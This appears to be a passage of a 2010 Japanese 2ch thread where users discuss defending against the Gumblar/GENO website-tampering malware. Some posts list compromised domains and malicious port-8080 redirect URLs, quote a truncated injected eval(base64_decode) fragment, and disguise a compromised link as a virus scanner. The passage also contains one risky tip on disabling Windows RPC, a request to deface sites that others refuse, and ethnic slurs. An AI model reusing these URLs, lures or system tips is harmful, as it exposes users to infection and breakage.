【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】 - 暇つぶし2ch372:名無しさん@お腹いっぱい。
10/05/05 23:27:38
>>371
改竄する価値は無いと思うw
自分のPCが感染してたら
クリーンインストールしてブログのパスワードも変えなきゃいけないのかあと思って

373:名無しさん@お腹いっぱい。
10/05/05 23:36:37
ampmda.comって奴は8080系だからリモートポート8080番塞いでれば無効化できるって認識でいいの?

374:名無しさん@お腹いっぱい。
10/05/05 23:37:40
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

375:名無しさん@お腹いっぱい。
10/05/05 23:40:15
ブログやSNS、HPもやってない俺は>>2以外に何をすればいいのだろう

376:371
10/05/05 23:48:12
>FTPサーバ上で提供されるサイトやブログがGumblarに感染して、

これ違ったか、個々のクライアントPCが感染するんだ、そしてFTPサーバ上で提供されるサイト開設やブログ開設サービスを使ってる場合にその管理者IDとPassを盗られる
だから、公開してないんだから大丈夫だと思ったけど上記の理由で大丈夫じゃない
それに管理者IDとPass盗られて改竄できるってことは、ただ閲覧されたりもするってことで
犯人たちの目的と興味次第ってことだと


377:名無しさん@お腹いっぱい。
10/05/05 23:52:10
>>372
日本語わからんからそういうの関係ないよ
軒並み改ざんされるだけ
ブログの場合はFTPじゃないとおもうんでまた別だろうけど
感染していた場合はそのPCで犯罪行為の手伝いをさせられるんでクリーンインストール推奨です

378:名無しさん@お腹いっぱい。
10/05/05 23:55:15
botnetwork使ってFTPにアップロード命令させてるんなら
blogまではいちいち改ざんしないとは思うけど
まぁ、過信は禁物だね

379:369
10/05/06 00:03:12
クリーンインストールやって、>>2をしっかりやったあとで、ブログのパスワードも変える
これが一番確かなんですよね
アドバイスくれた方々どうもです

>>2は以前からやってたけど
そもそも自分のブログは改竄される可能性があるのかどうかが気になって
ちょっと気持ち悪かったので質問させてもらいました

380:名無しさん@お腹いっぱい。
10/05/06 00:13:49
つーか被害の広がり方を見ると
意識の低さが浮き彫りになってるな

381:名無しさん@お腹いっぱい。
10/05/06 00:19:09
>>2には「使わないならインストールするな」と書き加えるべきだな

382:名無しさん@お腹いっぱい。
10/05/06 01:06:16
ブログは、直接htmlファイルをいじる訳じゃないし
タグを記述する場合もテキストボックス上で行うから
PCが感染してても問題ないように思うけど

383:名無しさん@お腹いっぱい。
10/05/06 01:27:55
■8080系の対策について
>>2をやっておけば「現時点では」感染しない。
※Adobe ReaderやJavaは必要無いならアンインストールを推奨
【参照】
サイト改ざん猛威:ウイルス感染を100%防げる「ソフトウェアの更新」を
URLリンク(www.so-net.ne.jp)
オラクル、JREの最新版「6 Update 20」公開~早急に更新しないと危険
URLリンク(www.so-net.ne.jp)

■以下は「自己満足」の世界(過剰防衛が好きな人向け)
・ブラウザのJavaScriptを切る(JavaScriptベースのDbd全般に有効)
・*:8080/*を含むURLをブロック(対8080系限定)
・8080番ポートを閉じる(対8080系限定/但し非推奨)


384:名無しさん@お腹いっぱい。
10/05/06 01:40:05
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
URLリンク(www.google.com)

385:名無しさん@お腹いっぱい。
10/05/06 02:51:57
>>384
ポート135を閉じる(RPC停止する)と問題発生することが多いと書いてあったが

>そこで,Windows XPが備えているパーソナル・ファイアウォールやセキュリティ対策ソフトに付いているクライアントPC用のファイアウォール機能で
>危険なポートを閉じれば,感染予防としてはさらに効果があります。しかし,既存システムへ与える影響は大きくなります。
>例えば,各PCでTCP/UDP135番を閉じてしまうと,RPCを用いたシステムやActive Directoryが拠点内でも利用できなくなります。
>また,TCP/UDP139番や445番を閉じると,ファイルやプリンタの共有さえできなくなります。

まあ、やるなら自己責任でってことで

386:385
10/05/06 02:53:33
ごめん、sageるの忘れてた

387:名無しさん@お腹いっぱい。
10/05/06 02:59:50
135はファイアウォールで閉じるのが常識だな
139や445はLANを組んでなかったら閉じても問題ない

388:名無しさん@お腹いっぱい。
10/05/06 03:04:41
ルータのファイアウォールの初期設定は0~1023のポートは閉じてるのが多いんじゃなかったっけ
外部からのアクセスのみだけど

389:名無しさん@お腹いっぱい。
10/05/06 03:08:04
ステートフルインスペクションだね

390:名無しさん@お腹いっぱい。
10/05/06 03:10:32
ステートフルインスペクション はガンブラーには無力だし

391:名無しさん@お腹いっぱい。
10/05/06 03:19:34
>>384にて135ポートを閉じると
OSの再インストールをするはめになる

回避策はあるがド素人はやめとけ

392:名無しさん@お腹いっぱい。
10/05/06 09:18:51
135、445、8080はsymantecのポートスキャンで「ステルス」になっていればいいんじゃないか?

393:名無しさん@お腹いっぱい。
10/05/06 10:13:00
ステルスってポートスキャンに対して反応返さない=空いてるかどうかわからないってだけで閉じてるわけじゃないのでは
シマンテックのスキャン使ったことないからわからないけど

今確認したら俺はポート135,445は受信ストリームはTCP/UDPとも俺は手持ちのカスペがデフォで閉じていた
8080は一応自分でTCP/UDPともリモートポートは閉じてみた

394:名無しさん@お腹いっぱい。
10/05/06 12:47:46
福本先生確認

395:394
10/05/06 12:48:36
誤爆しますた(´・ω・`)

396:名無しさん@お腹いっぱい。
10/05/06 12:54:03
絶対に許さない

397:名無しさん@お腹いっぱい。
10/05/06 13:07:56
絶対にだ

398:名無しさん@お腹いっぱい。
10/05/06 13:13:35
絶対ニダ

399:名無しさん@お腹いっぱい。
10/05/06 13:16:33
謝罪と賠償を求めるニダ

400:名無しさん@お腹いっぱい。
10/05/06 13:34:50
レイシストうざ

401:名無しさん@お腹いっぱい。
10/05/06 13:39:47
半島へ返れ

402:名無しさん@お腹いっぱい。
10/05/06 13:44:37
何言ってんだこのバカ

403:名無しさん@お腹いっぱい。
10/05/06 13:59:12
>>384
サービスを止めるのと、ポートを閉じるのは違うぞ。
サービス止めればOSに問題が起きるだろ。

404:385
10/05/06 16:10:17
>Gumblar.x #
>Gumblar.xの改ざんコードは日本のIPアドレスからのアクセスを弾く!?

URLリンク(www)●securelist●com/en/blog/2132/Gumblar_Farewell_Japan

↑これってGumblar.Xに関しては終息するってこと?

405:名無しさん@お腹いっぱい。
10/05/06 16:45:49
希望的観測はしない方がいい

406:名無しさん@お腹いっぱい。
10/05/06 17:00:33
だな
仮に今弾いてるとしても一時的なものと思ってた方がいい

407:名無しさん@お腹いっぱい。
10/05/06 17:23:32
FFFTPなんて日本人しか使ってないようなソフトを狙ってるんだから
Gumblarの大元の作者は日本への攻撃を念頭に置いてるだろうしな

408:名無しさん@お腹いっぱい。
10/05/06 17:29:59
日本の奴はアホみたいにかかるからな

409:名無しさん@お腹いっぱい。
10/05/06 17:34:47
「るーたーがあるからだいじょうぶ」「さわぎすぎだろ」
老害の思考はこんなもんです
そして「自分だけは大丈夫」と思ってる奴がかかってサイト持ちがまたバラ撒く悪循環

410:名無しさん@お腹いっぱい。
10/05/06 17:56:06
「自分だけは大丈夫」とか「ヘンなとこ見ないから俺には関係ない」とかホントにいるからなあ
そのくせ対策はセキュソフト任せでWindowsUpdateやってればマシな部類という…

411:名無しさん@お腹いっぱい。
10/05/06 18:03:12
OSアプデしててアンチウイルスきちんと使ってて、それ以上なにしろってんだ
PCにどこまでも人生の時間使ってられるかよ


412:名無しさん@お腹いっぱい。
10/05/06 18:10:45
>>411
本来それが理想なんだがな

413:名無しさん@お腹いっぱい。
10/05/06 18:29:43
クラウドコンピューティングが発達して行くと個人レベルではウイルス対策から開放される

これは間違いか?

414:名無しさん@お腹いっぱい。
10/05/06 18:31:29
評論家ごっこは他所でやれよ

415:名無しさん@お腹いっぱい。
10/05/06 18:31:50
ぺぺぺ^_^

416:名無しさん@お腹いっぱい。
10/05/06 18:32:08
pdfリーダーとflashplayerとjavaはアンインスコ推奨の方がいいと思う
今は大丈夫でも対策されるのは時間の問題だろうし
少なくとも、わざわざこんな板まで来るくらいに危機意識持ってるならアンインスコ必須かと

417:名無しさん@お腹いっぱい。
10/05/06 18:34:46
>>415
なんだあ、ぺぺぺって
わかりにくい反応すんなw

418:名無しさん@お腹いっぱい。
10/05/06 18:37:06
>>416
(  ゚,_ゝ゚)バカジャネーノ

419:名無しさん@お腹いっぱい。
10/05/06 18:38:44
>>416
JavaScriptも切っておけよ、極論厨

420:名無しさん@お腹いっぱい。
10/05/06 18:40:11
>>416
動画見れないとかなるとPC使う理由が半分はなくなる
エロだけのこと言ってんじゃないよ?
Flashplayer使えないとかネットしててもおもしろくないよ

421:名無しさん@お腹いっぱい。
10/05/06 18:40:15
>>419
それは普通に切るだろ

422:名無しさん@お腹いっぱい。
10/05/06 18:40:46
>>416
PDFリーダーとJavaはともかくFlash Playerアンインスコは非現実的でしょ

423:名無しさん@お腹いっぱい。
10/05/06 18:52:29
ブラウザの中にはFlashplayerを簡単にその場その場でON/OFFできるものがある
そういうものを使えば両者対立せずに済む

終了

424:名無しさん@お腹いっぱい。
10/05/06 19:44:09
>>423
で、OFFにしておいたまま放置してバージョンが古くなったFlashPlayerの
脆弱性をつつかれて感染ですね
わかります

425:名無しさん@お腹いっぱい。
10/05/06 19:53:56
Gumblarかかる層なんて、そもそもブラウザIEしかしらないのがほとんどだし
ON/OFF切り替えなんて発想無いぞ?

426:名無しさん@お腹いっぱい。
10/05/06 19:56:46
仮想環境にすればいい

427:名無しさん@お腹いっぱい。
10/05/06 21:56:37
ブラウザをアンインストールすれば解決

428:名無しさん@お腹いっぱい。
10/05/06 22:16:50
全人類が秘密を共有すれば解決

429:名無しさん@お腹いっぱい。
10/05/06 22:43:21
Gumblarかかる層なんてOSはWindowsしかしらないし

430:名無しさん@お腹いっぱい。
10/05/06 22:52:36
それ以前にガンブラーがどんなものか知らないに10モリタポ

431:名無しさん@お腹いっぱい。
10/05/06 22:55:11
すげえ低レベルになったな

432:名無しさん@お腹いっぱい。
10/05/06 23:00:09
へぇ
レベル高かったことって
あったっけ

433:名無しさん@お腹いっぱい。
10/05/06 23:01:26
ガンブラーのAAが初めてはられたときのみレベルが高かった
それ以外は糞

434:名無しさん@お腹いっぱい。
10/05/06 23:44:22
>>420
動画は落としてから見ればいいんじゃないか?

435:名無しさん@お腹いっぱい。
10/05/06 23:44:26
ガンブラーとガンプラの違いがわからないに1狐ぽ

436:名無しさん@お腹いっぱい。
10/05/06 23:59:40
違法な行為にならないか, よく調べて実行するように
URLリンク(www39.atwiki.jp)

437:名無しさん@お腹いっぱい。
10/05/07 00:31:55
Webブラウザ仮想化しておけば無問題じゃねーの
なんならOS毎仮想化しとけ

438:名無しさん@お腹いっぱい。
10/05/07 01:25:58
Gumblarかかる層の人間の話してるのに、なんで仮想化なんてキーワードが出てくるんだろう
奴等にできるわけねーだろ

439:名無しさん@お腹いっぱい。
10/05/07 02:50:45
荒れすぎワロタ

440:名無しさん@お腹いっぱい。
10/05/07 13:13:31
www●ems-kankyo●co●jp

441:名無しさん@お腹いっぱい。
10/05/07 13:29:45
てすt

442:コテハン ◆8080adndqg
10/05/07 14:16:53
www●hd-cre●com/bj-fh ←なんだこれ?
newegg-com●paypal●com●renren-com●wayoutmall●ru:8080/・・・以下略
<?eval(base64_decode("Cm1i・・・
あふぃ・・・なのか?

443:名無しさん@お腹いっぱい。
10/05/07 14:39:16
>>442
憶測は書くな。

444:名無しさん@お腹いっぱい。
10/05/07 17:24:20
それはそうとflash playerは10.0.45.2からしばらく更新が無いね

445:コテハン ◆8080adndqg
10/05/07 18:00:22
>>443 [・皿・;]
--
【陥落サイトのURL悪用厳禁】
blog●ceed●jp/ ←サイト内全滅w(.jsも)
myako●net/ ←中途半端な修正
※java2/imgkotei●js

www●hds-x●com/ ←Refresh

www●hds-x●com/top●html ←Gumblarがw
doujinnews●jp


446:名無しさん@お腹いっぱい。
10/05/07 18:20:53
>>445
一番下のドメインがこわい

447:名無しさん@お腹いっぱい。
10/05/07 18:21:23
気になるのだが
そのサイトのトップにはgumblerがあったとしても
そのサイトのトップ以外のページ(コラムとか他サイトへのリンクページとか)にはgumblerが無く
そこを見る分には大丈夫という場合はあるのか

まあ、>>2の対策をしていてもわざわざそんなページを見に行く物好きもそういないとおもうけど

448:名無しさん@お腹いっぱい。
10/05/07 18:22:10
>>444
そろそろまた新しいゼロデイが発生する頃だよな…
来月か再来月くらいのWindowsUpdateの前後に更新されると予想

449:名無しさん@お腹いっぱい。
10/05/07 18:23:10
>>447
あるけどいつ埋め込まれるかわからんしおすすめはしない

450:名無しさん@お腹いっぱい。
10/05/07 18:36:05
doujinnewsのとこ一番下だけじゃなく一番上にもあるのか
初めて見たけどいままで気付かなかっただけかな

451:名無しさん@お腹いっぱい。
10/05/07 18:57:55
adobeのセキュリティ意識の低さはもう完全に露呈されたんだから
flashplayerの代替品をMS辺りが用意してくれよ

452:名無しさん@お腹いっぱい。
10/05/07 19:20:07
>>451
F-Secureブログで、F-Secureで開発するかもって言ってた

453:名無しさん@お腹いっぱい。
10/05/07 19:20:48
>>451
つsilver light

454:名無しさん@お腹いっぱい。
10/05/07 20:25:13
>>451
どう間違ったらそこでMSなんだよ

455:名無しさん@お腹いっぱい。
10/05/07 20:57:52
>>453
silver lightは代替手段としてはありだと思うが
今の半分くらいまで負荷を下げてくれないと低スペPCがつらい
あとグラボの再生支援への対応

456:名無しさん@お腹いっぱい。
10/05/07 21:02:25
×silver light
○Silverlight

457:名無しさん@お腹いっぱい。
10/05/07 21:28:43
HTML5でいいじゃん

458:名無しさん@お腹いっぱい。
10/05/07 21:38:23
現時点ではHTML5用のリッチコンテンツを簡単に作るようなツールがないからなあ…

459:名無しさん@お腹いっぱい。
10/05/07 22:08:32
codec決まってないべ

460:名無しさん@お腹いっぱい。
10/05/07 22:23:10
IE9ではH.264のみらしいけど

461:コテハン ◆8080adndqg
10/05/07 23:37:20
doujinnews●jp 検索結果 約 7,730 件
www●google●co●jp/search?q=site%3Adoujinnews●jp&btnG=%E6%A4%9C%E7%B4%A2&hl=ja&lr=&sa=2
\(^o^)/オワタ

462:名無しさん@お腹いっぱい。
10/05/08 00:23:21
ガンブラー攻撃が常態化、トレンドマイクロ、4月のウイルス感染・報告ランキング(japan.internet.com)
URLリンク(headlines.yahoo.co.jp)

Yahooトップ

463:名無しさん@お腹いっぱい。
10/05/08 00:33:51
>>461
なんか気のせいか物凄まじくやばいような。

464:名無しさん@お腹いっぱい。
10/05/08 00:34:24
さっきMSEでTrojanDownloader:JS/Psyme.genが検出されたがGumblar?

465:名無しさん@お腹いっぱい。
10/05/08 00:34:37
俺もついに感染したようだ。このスレのアドレス開いてから
すぐにブルースクリーンになったりで調子が悪い

466:名無しさん@お腹いっぱい。
10/05/08 00:41:40
>>465
Kaspersky File Scanner オンラインウイルススキャン
URLリンク(blog.ceed.jp)

これで検出されなければ感染してないよ

467:名無しさん@お腹いっぱい。
10/05/08 00:48:06
>>465
Online Scanner
URLリンク(www.f-secure.com)

468:名無しさん@お腹いっぱい。
10/05/08 00:57:17
>>466-467
乙。

469:名無しさん@お腹いっぱい。
10/05/08 01:01:20
>>466-467ってKasperskyやF-secure以外のアンチウイルスソフト使っててもスキャン出来るの?

470:名無しさん@お腹いっぱい。
10/05/08 01:06:01
>>469
は?

471:名無しさん@お腹いっぱい。
10/05/08 01:08:24
>>470
あれ 競合しないのか

472:名無しさん@お腹いっぱい。
10/05/08 01:08:31
オンラインスキャンがなんたるかをよく理解してないらしい

473:名無しさん@お腹いっぱい。
10/05/08 01:08:37
>オンラインウイルススキャン
>Online Scanner

474:名無しさん@お腹いっぱい。
10/05/08 01:10:18
>>471
そんな認識だからPCウイルスに感染するんだぞ(笑)

475:名無しさん@お腹いっぱい。
10/05/08 01:12:23
>>465
このスレのアドレス?
このスレ開いたら感染するのか?

476:名無しさん@お腹いっぱい。
10/05/08 01:17:55
>>474
ホントにな…

477:名無しさん@お腹いっぱい。
10/05/08 01:25:00
>>464
トロイの木馬だけどGumblarでは無いな

478:名無しさん@お腹いっぱい。
10/05/08 01:25:45
>>475
うん

479:名無しさん@お腹いっぱい。
10/05/08 01:31:02
>>478
そんなこと全然ないけど?
live2chで見てるけど全然平気なんだけど
>>2の対策をしてるからかな?

480:名無しさん@お腹いっぱい。
10/05/08 01:33:50
>このスレのアドレス?
うん

>このスレ開いたら感染するのか?
うん

どっちやねん

481:名無しさん@お腹いっぱい。
10/05/08 01:36:51
>>479
信じるなよw

482:名無しさん@お腹いっぱい。
10/05/08 01:53:25
PDFに埋め込まれた全プログラムを無効化できるようになった「Foxit Reader」v3.3
URLリンク(www.forest.impress.co.jp)

これどうなんだろ?

483:名無しさん@お腹いっぱい。
10/05/08 02:07:23
対策もしてないのにこのスレで挙げられてる陥落サイトのアドレスを
うっかり踏んじゃったってことじゃないか。

484:名無しさん@お腹いっぱい。
10/05/08 02:27:36
>>466-476
競合もしないレベルで動くオンラインスキャン使ってスキャンして、
それで何もないからってどれ位の意味なの

485:名無しさん@お腹いっぱい。
10/05/08 02:29:52
結局そのオンラインスキャンを実行してるのは、感染疑いのあるそのPC自体でしょ
すくなくともインストールして使うもの利用したほうがいいのかね

486:名無しさん@お腹いっぱい。
10/05/08 03:12:02
doujinnewsのやつ
URLリンク(www.virustotal.com)
結果: 1/41 (2.44%)
McAfee-GW-Edition:Heuristic.BehavesLike.HTML.Shellcode.K

487:名無しさん@お腹いっぱい。
10/05/08 08:17:07
>>466のアドレスへ行ったのですが、
Kasperskyのオンラインスキャンがあるのかわかりません。
どなたか教えてください。よろしくお願いします。


488:名無しさん@お腹いっぱい。
10/05/08 08:36:53
>>487
そこGumblarの可能性ありって出るよ

489:名無しさん@お腹いっぱい。
10/05/08 09:09:12
www●spoffice●jp

株式会社セカンドプランニング この会社が関わっている
yamatwo●jp
www●sobank●jp
www●spoffice●jp
全てが改ざん

490:名無しさん@お腹いっぱい。
10/05/08 09:23:25
>>488
そうですか・・・
教えてくださってありがとうございます。
一応>>2-3あたりの対策はしているのですが
クリーンインストールした方がいいですか?
何度もすいません。

491:名無しさん@お腹いっぱい。
10/05/08 09:35:13
ネット上にあがってるWebサイトの改竄方法を教えてください
ウイルスを仕込むわけではなくバナーを消したり文章を変える程度です
Web改竄について詳しく書いてあるサイトを教えてくれる形でもいいです
お願いします

492:名無しさん@お腹いっぱい。
10/05/08 09:40:27
スレチだゴミ

493:名無しさん@お腹いっぱい。
10/05/08 09:57:54
最近嘘書いて改ざんサイトに誘導するバカが出没してるな
しかもそれに対して大体レスが付くことから自演を駆使してるようだ
どうせ>>465-471あたりは同一人物だろ
でもって>>490はキモイ流れになってる事とおかしなURLから危険を察しろ

494:名無しさん@お腹いっぱい。
10/05/08 11:53:36
suncs●sakura●ne●jp
www●kfbclub●com

495:名無しさん@お腹いっぱい。
10/05/08 12:06:55
>>490
URLがそのままなのはまあ黒だろ
迂闊に踏む前にちょっと流れ見るべきだね
どうせ誘導したいクソは自分が踏んで感染した腹いせなんだろうが
ひょいとのぞきに来たような人は無理に流れに参加しようとしなくていい

496:名無しさん@お腹いっぱい。
10/05/08 12:47:39
>>493>>495
ご迷惑掛けてすいません。
クリーンインストールはいいのですが
残しておきたいデータなどがあるのでほんと落ち込んでます。
今は起動させてない外付けがあるのですが、
そちらに移すと外付けの方にもダメになりますか?
基本的なことかもしれませんがどうか教えてください。



497:名無しさん@お腹いっぱい。
10/05/08 13:38:36
>>496
そんな大事なデータをバックアップとっていないのなら
今回は勉強として諦めた方がいいよ
悔しいのはわかるけどね

498:名無しさん@お腹いっぱい。
10/05/08 13:39:35
>>496
ざまあああああ

499:名無しさん@お腹いっぱい。
10/05/08 14:16:12
>>496 aguseで確認
dirtysin.ru:8080○google.com○kakaku.com○110mb.com○php

ご愁傷様・・・

500:名無しさん@お腹いっぱい。
10/05/08 14:31:59
最近のGumblarはGENOみたいに動作が重くなるとか変なファイル作成はあるのかなあ

501:名無しさん@お腹いっぱい。
10/05/08 14:44:03
>>2をしっかりやってても踏んだら感染するのか?・・

502:名無しさん@お腹いっぱい。
10/05/08 15:03:13
MyJVNバージョンチェッカ IE8に対応すればいいのになあ

URLリンク(jvndb.jvn.jp)

503:名無しさん@お腹いっぱい。
10/05/08 15:21:11
Windows 7にも未対応だって笑わせるな

504:名無しさん@お腹いっぱい。
10/05/08 16:00:29
>>496
そんな大事なら他のメディアに移すことも考えてみたら
Gumblarの挙動の基本はサイトの管理者アカウントを盗むことらしいし
亜種だったら他のこともするらしいけど
このスレにそこらの書き込みあったと思うよ
一方でOSクリーンインストールする時には、HDD上にデータはすべて消してからのがいいんだろうね多分

505:名無しさん@お腹いっぱい。
10/05/08 16:01:49
107 :('д') ◆yUyb3Tqn92 :2010/05/08(土) 15:04:26 ID:f48FTMOs
>>97はここのコピペだぞw
URLリンク(blog.ceed.jp)

よくできておるのう ´,дゝ`)コピペにマジレス乙だお





↑を踏んでしまいました。
このコテが言うにはガンブラウィルスらしいのですが、釣りや脅しのような気がするので鑑定よろ

506:名無しさん@お腹いっぱい。
10/05/08 16:07:14
アドレス貼りのルールも守れない馬鹿にはいい気味だ

507:名無しさん@お腹いっぱい。
10/05/08 16:08:20
>>505
馬鹿か
すれ違いじゃ

508:名無しさん@お腹いっぱい。
10/05/08 16:09:11
>>506
馬鹿
所詮ローカルルールだと気づけ馬鹿

509:名無しさん@お腹いっぱい。
10/05/08 16:10:02
505 ざまぁwwww

510:名無しさん@お腹いっぱい。
10/05/08 16:10:04
sageろとかいう馬鹿と同じで
システム上できることは仕様だから仕方ないさ
よほどのことしないかぎりね。


511:名無しさん@お腹いっぱい。
10/05/08 16:11:06
マジレスすると('д')のコテ付けた奴はウィルス貼ってる常習犯なわけだが
今回ばかりは505みたいな阿呆にウィルスを踏ませた('д')をGJと言いたいwwwwwww

512:名無しさん@お腹いっぱい。
10/05/08 16:11:46
ガチでGumblarだしざまぁ
URLリンク(dirtysin)●ru:8080/google●com/kakaku●com/110mb●com●php

513:名無しさん@お腹いっぱい。
10/05/08 16:14:02
>>512
>>5>>91のチェッカー全部スルーしてやがる


514:名無しさん@お腹いっぱい。
10/05/08 16:16:11
os:win7 64bit アップデート済み
northon2010 更新済み
adobe reader 最新ver

JREはup17だったと思われ。
この環境で上記URL踏んでしまったのだが
ノートン先生でフル検索かけてもウィルスが見つからない。
後外部から自分のPCに向けてポートスキャンかけてみたけど(LANで)、異常無し。

普段wimaxで接続してるからgkbrなんだが…さてはて

515:名無しさん@お腹いっぱい。
10/05/08 16:18:00
上記

516:514
10/05/08 16:21:53
おいらが踏んだのはこれです。
URLリンク(blog)<)○megalodon.jp/2008-0922-1659-16/www○geocities○com/imomushi2005/imomushi20○htm
これを踏んで
Nine-Ball Mass Injectionがどうたらって警告が出たので
その対策を調べに来ていてやられました。マジ情けない…

517:名無しさん@お腹いっぱい。
10/05/08 16:26:01
>>516
お前>>505だろwwwwwwwwwwww
だからURL貼り忘れたんだべwwwwwww他いけよもうw

518:491
10/05/08 16:28:33
>>492
スレチかもしれませんがここのスレの人が一番詳しそうなので>>491について教えてくださいお願いします


519:名無しさん@お腹いっぱい。
10/05/08 16:31:51
ママに聞けクソガキ

520:名無しさん@お腹いっぱい。
10/05/08 16:33:13
>>518
犯罪

521:名無しさん@お腹いっぱい。
10/05/08 16:41:42
>>518
ばーか

522:名無しさん@お腹いっぱい。
10/05/08 16:46:15
>>518
バカ

523:名無しさん@お腹いっぱい。
10/05/08 16:47:28
いろいろ、ヘンなのが沸いてきたね。
連休疲れ?

524:名無しさん@お腹いっぱい。
10/05/08 16:54:24
>>518

                ハ        _
    ___         ∥ヾ     ハ
  /     ヽ      ∥::::|l    ∥:||.
 / 聞 え  |     ||:::::::||    ||:::||
 |  こ ?  |     |{:::::∥.  . .||:::||
 |  え      |     _」ゝ/'--―- 、|{::ノ!
 |  な 何   |  /   __      `'〈
 |  い ?   ! /´   /´ ●    __  ヽ
 ヽ      / /     ゝ....ノ   /´●   i
  ` ー―< {           ゝ- ′ |
        厶-―    r  l>        |
      ∠ヽ ゝ-―     `r-ト、_,)      |
      レ^ヾ ヽ>' ̄     LL/  、   /
      .l   ヾ:ヽ ` 、_      \\ '
     l    ヾ:ヽ   ト`ー-r-;;y‐T^
      |    ヾ `ニニ「〈〉フ /∥. j

525:名無しさん@お腹いっぱい。
10/05/08 17:26:33
>>517
違うんじゃないか
urlが中途半端に違う
このスレで踏んだ奴だろ

>>505は、=>>508>>510

つーか規制食らったww

526:コテハン ◆8080adndqg
10/05/08 18:49:58
>>501
最新版に更新済でも、JAVAの旧バージョンの残骸が残ってたりすると
やられてしまう可能性があるのです・・・

このスレの住人以外の方へ>
貼ってあるアヤシイURLは直接踏まず
【aguse Gateway】
URLリンク(gw.aguse.jp)
ここを使いましょう。

>aguse Gatewayとは?
スクリーンキャプチャを使った完全に安全なブラウザ型ゲートウェイです。
>サイトを1枚ずつキャプチャして見せ、ブラウザに準じた動作が可能です。


527:名無しさん@お腹いっぱい。
10/05/08 18:57:29
感染確認方法がないのが怖い

528:名無しさん@お腹いっぱい。
10/05/08 18:57:33
aguseは現状のGumblar検出用には当てにならん
あやしいURLリンク(www.example.com:8080)の:8080とかは検出してくれるけど
そこも注意深く見ないと安全なサイトにしか見えないし

529:名無しさん@お腹いっぱい。
10/05/08 19:31:17
なんかFTPのパス抜かれるだけ、って結論に上の方でなってるけど、
確か最初はネトゲのパスが抜かれてたような記憶がある
去年の夏ごろの上に出てたAsian motorsのサイトだったような気が、、、

てか、感染サイトのお知らせ、アンチウイルスサイトのアドレス貼って、そこ行け、で済ませてる所多いけど、
感染してたらウイルス除去、だけじゃ済まんだろ。
FTP以外のパス変えたり、クレカ会社に連絡しなきゃ、たとえクリーンストールしても、
意味無いような気がする。

530:名無しさん@お腹いっぱい。
10/05/08 19:49:03
三井住友VISAはあの程度で済ますとか被害わかってやってんのかな?
仮にもクレジットカード会社の取る行動じゃないよな

531:名無しさん@お腹いっぱい。
10/05/08 20:56:50
>>512
VirusTotalだとどうなのだろう

532:名無しさん@お腹いっぱい。
10/05/08 21:01:57
まあ心配ならゲーム機でネット見るとかすればいいんじゃね

533:名無しさん@お腹いっぱい。
10/05/08 21:07:17
何だか>>504以降の書き込み時間が近接してるな

534:名無しさん@お腹いっぱい。
10/05/08 21:11:34
>>518
それ改ざんとはいわないだろ
要するに広告ブロックとかしたいんじゃないの
あとはぐぐれ

535:名無しさん@お腹いっぱい。
10/05/08 21:12:36
>>529
そんな結論にはなってないとおもうよ

536:名無しさん@お腹いっぱい。
10/05/08 21:20:19
>>532
KNOPPIXをDVD起動で使用

537:名無しさん@お腹いっぱい。
10/05/08 22:39:44
KNOPPIXをusb起動で使用

538:名無しさん@お腹いっぱい。
10/05/08 23:27:54
>>534
広告ブロックではなく文章や写真を少しだけ変えて知り合いを驚かせたいんです。
そのためには管理者側としてソースコードを書き換える必要があると思うのですが
難しいのでしょうか?
ちょっとした自己掲示欲でウイルスを入れようなどは考えていません。
ここにいる人は詳しいと思ったのでここで質問させていただきました。

539:名無しさん@お腹いっぱい。
10/05/08 23:29:33
本当の意味での改竄じゃん

540:名無しさん@お腹いっぱい。
10/05/08 23:32:42
それは犯罪w

541:名無しさん@お腹いっぱい。
10/05/08 23:35:05
>>538
失せろダニ

542:名無しさん@お腹いっぱい。
10/05/08 23:36:44
>>538
(  ゚,_ゝ゚)バカジャネーノ

543:名無しさん@お腹いっぱい。
10/05/08 23:41:14
自己掲示欲て

544:名無しさん@お腹いっぱい。
10/05/08 23:43:05
>>538
それは犯罪です

545:名無しさん@お腹いっぱい。
10/05/08 23:44:58
>>516
これってここに貼ってあったやつだけど改竄されてるか?
今見たけどカスペもシマンテックもアバストも特に反応しねーが

546:名無しさん@お腹いっぱい。
10/05/08 23:46:53
>>538
あまりにも幼稚な発想でこわいわ
お前がサイト持ってて突然改ざんされたら驚く程度では済まなくね?
恐怖感のほうが強いはず
ストーカーか何かなの?
軽いイタズラじゃ済まないよ

547:名無しさん@お腹いっぱい。
10/05/08 23:48:59
>>545
上はこっそり修正したのかもしれん
Date: Sat, 08 May 2010 14:47:09 GMT

たぶんそのうちまた再改ざんされるんじゃね

548:名無しさん@お腹いっぱい。
10/05/08 23:49:29
>>545
今は直ってるけど、少なくともURLリンク(blog)●ceed●jp/は>>512が埋まってた

549:名無しさん@お腹いっぱい。
10/05/08 23:58:07
>>547->>548
なるほど、サンクス
修正はされたけどアナウンスはされてないのねw

550:名無しさん@お腹いっぱい。
10/05/09 00:14:37
>>548
そのURL踏むとPC動作重くなったり何かファイル組みこんだりする?

551:名無しさん@お腹いっぱい。
10/05/09 01:40:48
>>550
過去に踏んでしまったのならそういうこともあるかもしれません

552:名無しさん@お腹いっぱい。
10/05/09 02:08:06
>>538
